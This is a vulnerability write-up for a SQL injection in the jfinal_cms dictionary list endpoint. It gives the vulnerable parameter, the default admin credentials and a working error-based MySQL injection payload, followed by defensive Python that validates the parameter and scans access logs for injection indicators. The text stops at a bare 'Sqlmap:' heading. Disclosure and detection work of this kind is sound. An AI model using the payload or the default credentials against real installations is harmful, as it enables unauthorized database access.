Vulnerability Analysis
The vulnerability is in lines 23-28 of com.jflyfox.system.dict.DictController.java.
The attrVal parameter is the attr.dict_type parameter passed from the front end, so a payload can be constructed to exploit this vulnerability.
Exploit
Environment: started with Maven
Vulnerable address: /jfinal_cms/system/dict/list
Administrator login is required. The default account and password are admin:admin123
Injection parameter: attr.dict_type
payload:
' OR (SELECT 2896 FROM(SELECT COUNT(*),CONCAT(0x717a7a6271efbd9e,(SELECT (ELT(2896=2896,user()))),0xefbd9e7162707a7131,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)--+
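As an added example (not part of the original write-up and not code from the jfinal_cms project), the following Python script shows the defender's side of this issue: an allowlist check that a fixed handler should apply to attr.dict_type before the value reaches any SQL, and a log scanner that flags requests to the list endpoint whose attr.dict_type value carries the error-based injection pattern shown above. The Combined Log Format layout, the allowlist rule for dict_type and the indicator set are assumptions; the log entries are constructed.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlencode, urlsplit

# Endpoint and parameter named in the write-up.
TARGET_PATH = "/jfinal_cms/system/dict/list"
INJECTED_PARAM = "attr.dict_type"

# Assumption (not stated on the page): a legitimate dict_type is a short
# identifier made of letters, digits and underscores. A fixed handler should
# reject anything else before the value gets anywhere near SQL.
DICT_TYPE_RE = re.compile(r"^[A-Za-z0-9_]{1,64}$")

# Textual indicators of the error-based technique used by the payload above.
SQLI_INDICATORS = [
    ("quote", re.compile(r"'")),
    ("comment", re.compile(r"--\s*$|--\+|#")),
    ("information_schema", re.compile(r"information_schema", re.I)),
    ("floor_rand", re.compile(r"floor\s*\(\s*rand\s*\(", re.I)),
    ("group_by", re.compile(r"group\s+by", re.I)),
    ("subselect", re.compile(r"\bselect\b.*\bfrom\b", re.I | re.S)),
]

# Combined Log Format request line, e.g. 'ip - - [ts] "GET /path?q HTTP/1.1" 200 123'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def is_valid_dict_type(value: str) -> bool:
    """Allowlist check for attr.dict_type (server-side mitigation)."""
    return DICT_TYPE_RE.fullmatch(value) is not None


def sqli_indicators(value: str) -> List[str]:
    """Names of the indicator patterns that match a decoded parameter value."""
    return [name for name, pattern in SQLI_INDICATORS if pattern.search(value)]


def analyze_log_line(line: str) -> Optional[Dict]:
    """Return a verdict for requests to the dict list endpoint, None otherwise."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path != TARGET_PATH:
        return None
    # parse_qs percent-decodes and turns '+' back into a space, so the
    # trailing '--+' of the payload becomes '-- ' here.
    values = parse_qs(parts.query, keep_blank_values=True).get(INJECTED_PARAM, [])
    findings = []
    for value in values:
        hits = sqli_indicators(value)
        if hits or not is_valid_dict_type(value):
            findings.append({"value": value, "indicators": hits})
    return {
        "ip": m.group("ip"),
        "status": int(m.group("status")),
        "suspicious": bool(findings),
        "findings": findings,
    }


def scan(lines: List[str]) -> List[Dict]:
    """All suspicious dict-list requests in a batch of log lines."""
    results = (analyze_log_line(line) for line in lines)
    return [r for r in results if r is not None and r["suspicious"]]


# Constructed sample log lines (not real traffic). The second one carries the
# payload from the advisory, URL-encoded the way a browser or sqlmap would send it.
PAYLOAD = (
    "' OR (SELECT 2896 FROM(SELECT COUNT(*),CONCAT(0x717a7a6271efbd9e,"
    "(SELECT (ELT(2896=2896,user()))),0xefbd9e7162707a7131,FLOOR(RAND(0)*2))x "
    "FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- "
)
SAMPLE_LOGS = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] '
    '"GET /jfinal_cms/system/dict/list?attr.dict_type=sys_user_status HTTP/1.1" 200 1832',
    '198.51.100.9 - - [10/Oct/2023:13:57:02 +0000] '
    f'"GET /jfinal_cms/system/dict/list?{urlencode({INJECTED_PARAM: PAYLOAD})} HTTP/1.1" 500 412',
    '203.0.113.5 - - [10/Oct/2023:13:58:10 +0000] '
    '"GET /jfinal_cms/system/user/list?name=o%27brien HTTP/1.1" 200 2210',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(hit["ip"], hit["status"], hit["findings"][0]["indicators"])
```

The allowlist check is the actual fix (combined with a parameterized query in the controller); the scanner is for hunting through existing access logs for earlier attempts against the same parameter, and only looks at the one endpoint so that a quote in an unrelated field (the third sample line) does not raise noise.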
Sqlmap: